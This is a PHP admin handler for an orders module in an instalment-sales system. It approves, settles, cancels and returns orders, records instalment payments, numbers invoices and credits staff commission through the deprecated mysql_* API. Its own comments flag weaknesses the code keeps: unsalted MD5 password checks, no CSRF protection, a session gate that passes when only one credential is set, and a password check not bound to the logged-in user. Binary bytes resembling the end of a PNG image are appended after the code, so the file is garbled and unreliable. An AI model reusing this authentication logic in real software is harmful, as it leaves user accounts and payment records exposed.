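<?php
/**
 * POST action handler for the "orderan" (orders) admin module.
 *
 * Dispatches on $_GET['module'] / $_GET['act'] and writes to list_orderan,
 * list_pembayaran and staff through the legacy mysql_* API. The connection is
 * not opened in this file; presumably konfig/koneksi.php does it.
 * $tgl_sekarang and $jam_sekarang are not defined here either; presumably
 * konfig/library.php sets them to the current date and time.
 *
 * Security notes for maintainers:
 *  - Every request value is escaped before it is placed in a SQL string.
 *    mysql_real_escape_string() depends on the connection character set, so
 *    confirm koneksi.php sets it with mysql_set_charset(). Moving the module
 *    to PDO or mysqli prepared statements is the durable fix.
 *  - No anti-CSRF token is checked on any of these state-changing actions.
 *  - NOTE(review): the session gate only redirects when BOTH namauser and
 *    passuser are empty; confirm whether "either is empty" was intended.
 */
session_start();
//error_reporting(0);

/**
 * Returns $_POST[$key] as a plain string, or '' when the field is missing or
 * is not a scalar (for example an array submitted as key[]).
 */
function orderan_post_raw($key)
{
    if (!isset($_POST[$key]) || !is_scalar($_POST[$key])) {
        return '';
    }
    $value = (string) $_POST[$key];
    // Where magic_quotes_gpc is still enabled the value already carries
    // backslashes; strip them so the SQL escaping is not applied twice.
    if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
        $value = stripslashes($value);
    }
    return $value;
}

/**
 * Returns $_POST[$key] escaped for use inside a single-quoted SQL literal.
 * Must only be called after the database connection has been opened.
 */
function orderan_post_sql($key)
{
    return mysql_real_escape_string(orderan_post_raw($key));
}

if (empty($_SESSION['namauser']) AND empty($_SESSION['passuser'])) {
    header('location:../../lockscreen.php');
    // Stop here so nothing below can run for an unauthenticated request.
    exit;
} else {
    include "../../konfig/koneksi.php";
    include "../../konfig/fungsi_thumb.php";
    include "../../konfig/library.php";

    $module = isset($_GET['module']) ? $_GET['module'] : '';
    $act = isset($_GET['act']) ? $_GET['act'] : '';

    if ($module == 'orderan' AND $act == 'ok') {
        // Approve an order: store the order number and notes, set status '2'.
        $id_list_orderan = orderan_post_sql('id_list_orderan');
        $no_order = orderan_post_sql('no_order');
        $catatan_orderan = orderan_post_sql('catatan_orderan');
        $catatan_cicilan = orderan_post_sql('catatan_cicilan');
        mysql_query("UPDATE list_orderan SET no_order='$no_order', catatan_orderan='$catatan_orderan', catatan_cicilan='$catatan_cicilan', id_status_lo='2', tanggal_approve='$tgl_sekarang' WHERE id_list_orderan='$id_list_orderan'");
        header('location:orderan');
    } elseif ($module == 'orderan' AND $act == 'pembayaran') {
        // Record one or more instalment payments after a password re-check.
        $id_list_orderan = orderan_post_sql('id_list_orderan');
        // Cast to int: this value bounds the loop below and must not be free text.
        $jumlah_bayar = (int) orderan_post_raw('jumlah_bayar');
        $username = orderan_post_sql('username');

        // SECURITY: stored passwords are compared as unsalted MD5. That is not
        // a password hash; migrate to password_hash()/password_verify() together
        // with the login code. The raw POST value is hashed unchanged so existing
        // stored hashes keep matching.
        // NOTE(review): any valid username/password pair passes this check; it
        // is not tied to the account held in the session.
        $password_input = (isset($_POST['password']) && is_string($_POST['password'])) ? $_POST['password'] : '';
        $password = md5($password_input);

        $cek_login = mysql_num_rows(mysql_query("SELECT * FROM users WHERE username='$username' AND password='$password'"));
        if ($cek_login > 0) {
            // Stays null unless at least one instalment is recorded, so a request
            // with jumlah_bayar < 1 can no longer fall into the settlement branch.
            $sisa = null;

            for ($i = 1; $i <= $jumlah_bayar; $i++) {
                // Re-read the order every round: the previous round updated it.
                $d = mysql_fetch_array(mysql_query("SELECT * FROM list_orderan WHERE id_list_orderan='$id_list_orderan'"));
                if (!$d) {
                    // Unknown order id: do not insert payment rows for it.
                    break;
                }
                $cicilan = $d['cicilan'];
                // Both counters go down by one per payment and never below zero.
                $tunggak = ($d['tunggak'] == 0) ? 0 : $d['tunggak'] - 1;
                $sisa = ($d['sisa'] == 0) ? 0 : $d['sisa'] - 1;
                // NOTE(review): a payment is still inserted when sisa was already 0.

                $lp = mysql_fetch_array(mysql_query("SELECT * FROM list_pembayaran WHERE id_list_orderan='$id_list_orderan' ORDER BY id_list_pembayaran DESC LIMIT 1"));
                $cicilan_ke = ($lp ? (int) $lp['cicilan_ke'] : 0) + 1;
                $besar_bayar = mysql_real_escape_string($cicilan);

                // Invoice numbers look like 'FL' + YYMM + 4-digit sequence; the
                // sequence restarts at 0001 when the YYMM part changes.
                // NOTE(review): reading MAX() and inserting afterwards is not
                // atomic, so two concurrent payments could get the same number.
                $sql = mysql_query("SELECT MAX(no_invoice) AS no_invoice FROM list_pembayaran");
                $r = mysql_fetch_array($sql);
                $no_invoice = $r['no_invoice'];
                $kode_before = substr($no_invoice, 2, 4);
                $tahun = date('Y');
                $bulan = date('m');
                $thn = substr($tahun, -2);
                $kode_now = $thn.$bulan;
                if ($kode_before == $kode_now) {
                    $no_urut = (int) substr($no_invoice, 6, 4);
                    $no_urut++;
                    $no_invoice_new = 'FL'.$kode_before.sprintf("%04s", $no_urut);
                } else {
                    $no_invoice_new = 'FL'.$kode_now.sprintf("%04s", 1);
                }

                mysql_query("INSERT INTO list_pembayaran (id_list_orderan, no_invoice, tanggal_pembayaran, jam_pembayaran, cicilan_ke, jumlah_bayar) VALUES ('$id_list_orderan', '$no_invoice_new', '$tgl_sekarang', '$jam_sekarang', '$cicilan_ke', '$besar_bayar')");
                mysql_query("UPDATE list_orderan SET sisa='$sisa', tunggak='$tunggak' WHERE id_list_orderan='$id_list_orderan'");
            }

            if ($sisa !== null && $sisa == 0) {
                // Nothing left to pay: set status '3' and credit the staff commission.
                mysql_query("UPDATE list_orderan SET id_status_lo='3' WHERE id_list_orderan='$id_list_orderan'");
                $c = mysql_fetch_array(mysql_query("SELECT * FROM list_orderan WHERE id_list_orderan='$id_list_orderan'"));
                // Values read back from the database are escaped too before reuse.
                $id_customer = mysql_real_escape_string($c['id_customer']);
                $d = mysql_fetch_array(mysql_query("SELECT * FROM customer a, staff b WHERE a.id_staff=b.id_staff AND a.id_customer='$id_customer'"));
                $setting = mysql_fetch_array(mysql_query("SELECT * FROM setting WHERE id_setting='1'"));

                // Commission rate by tenor; any other tenor earns no commission.
                $komisi_tambahan = 0;
                if ($c['tenor'] == 1) {
                    $komisi_tambahan = $setting['komisi_cash'];
                } elseif ($c['tenor'] == 25) {
                    $komisi_tambahan = $setting['komisi_25'];
                } elseif ($c['tenor'] == 50) {
                    $komisi_tambahan = $setting['komisi_50'];
                }
                $komisi = $komisi_tambahan * $c['cicilan'] * $c['tenor'] / 100;
                $komisi_sekarang = $d['komisi'] + $komisi;
                $id_staff = mysql_real_escape_string($d['id_staff']);
                mysql_query("UPDATE staff SET komisi='$komisi_sekarang' WHERE id_staff='$id_staff'");
            }
?>
<script type="text/javascript">alert("Pembayaran berhasil");history.go(-1);</script>
<?php
        } else {
?>
<script type="text/javascript">alert("Kata sandi salah");history.go(-1);</script>
<?php
        }
    } elseif ($module == 'orderan' AND $act == 'lunas') {
        // Set status '3' and stamp tanggal_lunas, without recording a payment.
        $id_list_orderan = orderan_post_sql('id_list_orderan');
        $catatan_orderan = orderan_post_sql('catatan_orderan');
        $catatan_cicilan = orderan_post_sql('catatan_cicilan');
        mysql_query("UPDATE list_orderan SET catatan_orderan='$catatan_orderan', catatan_cicilan='$catatan_cicilan', id_status_lo='3', tanggal_lunas='$tgl_sekarang' WHERE id_list_orderan='$id_list_orderan'");
        header('location:orderan');
    } elseif ($module == 'orderan' AND $act == 'batal') {
        // Set status '4' with a cancellation note and stamp tanggal_batal.
        $id_list_orderan = orderan_post_sql('id_list_orderan');
        $catatan_pembatalan = orderan_post_sql('catatan_pembatalan');
        mysql_query("UPDATE list_orderan SET catatan_pembatalan='$catatan_pembatalan', id_status_lo='4', tanggal_batal='$tgl_sekarang' WHERE id_list_orderan='$id_list_orderan'");
        header('location:orderan');
    } elseif ($module == 'orderan' AND $act == 'retur') {
        // Set status '5' with a return note and stamp tanggal_retur.
        $id_list_orderan = orderan_post_sql('id_list_orderan');
        $catatan_retur = orderan_post_sql('catatan_retur');
        mysql_query("UPDATE list_orderan SET catatan_retur='$catatan_retur', id_status_lo='5', tanggal_retur='$tgl_sekarang' WHERE id_list_orderan='$id_list_orderan'");
        header('location:orderan');
    }
}
?>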
�
y���~�or�5�J�={��E��e�u磝Qk��ᯘG{�?���+�]������ן�?w�M3X^��歌>{�7پ�K�>�o��n�\����j�y��R���g/�=��f�O��r�o��NV�v��~�Y+��NG�u���Ý����HW��y�w�[eQ�ʨ�S�b��>������>�}G�mx[o[<��{���Ϯ_��qF���vMIEND�B`�